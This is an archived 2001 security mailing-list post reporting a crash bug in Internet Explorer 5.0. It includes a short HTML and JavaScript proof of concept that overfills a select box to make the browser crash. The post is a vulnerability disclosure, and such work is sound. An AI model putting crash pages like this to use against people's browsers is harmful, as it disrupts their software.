I: IE 5.0 vulnerability

From: Thomas Magnum (dr_oo_pyat_private)
Date: Tue May 22 2001 - 08:44:20 PDT

Next message: Uidam, T (Tim): "RE: IE 5.0 vulnerability"

Previous message: Kayne Ian (Softlab): "Crash IE with shell://:"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I found out a vulnerability for IE 5.0, don't know if it was already
discovered (if so, forget this). It seems that the problem is javascript.
I don't know if it is exploitable, but if I try to open an html file like
this:

<script>
function crashme() {
 var i, opt;
 for(i = 0; i < 7; i++) {
  opt = new Option('crashing...', i);
  document.vulnForm.p_select.options[i] = opt;
  document.vulnForm.p_select.options[i].selected = true;
 }
}
</script>

<html>
<head>
<title>IE 5.0 Vulnerability</title>
</head>
<body>
<form name="vulnForm">
  <table width="100%" border="0">
    <tr>
      <td align="center">
          <select name="p_select" size="5" multiple>
            <option>__________________</option>
          </select>
      </td>
    </tr>
    <tr>
      <td align="center">
          <input type="button" name="cmd" value="go!" onClick="crashme()">
      </td>
    </tr>
  </table>
</form>
</body>
</html>

I get the classical Winxx error...

I noticed that IE crashes when I try to put in the select at least 3 items
more than its size.

Next message: Uidam, T (Tim): "RE: IE 5.0 vulnerability"
Previous message: Kayne Ian (Softlab): "Crash IE with shell://:"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue May 22 2001 - 09:47:24 PDT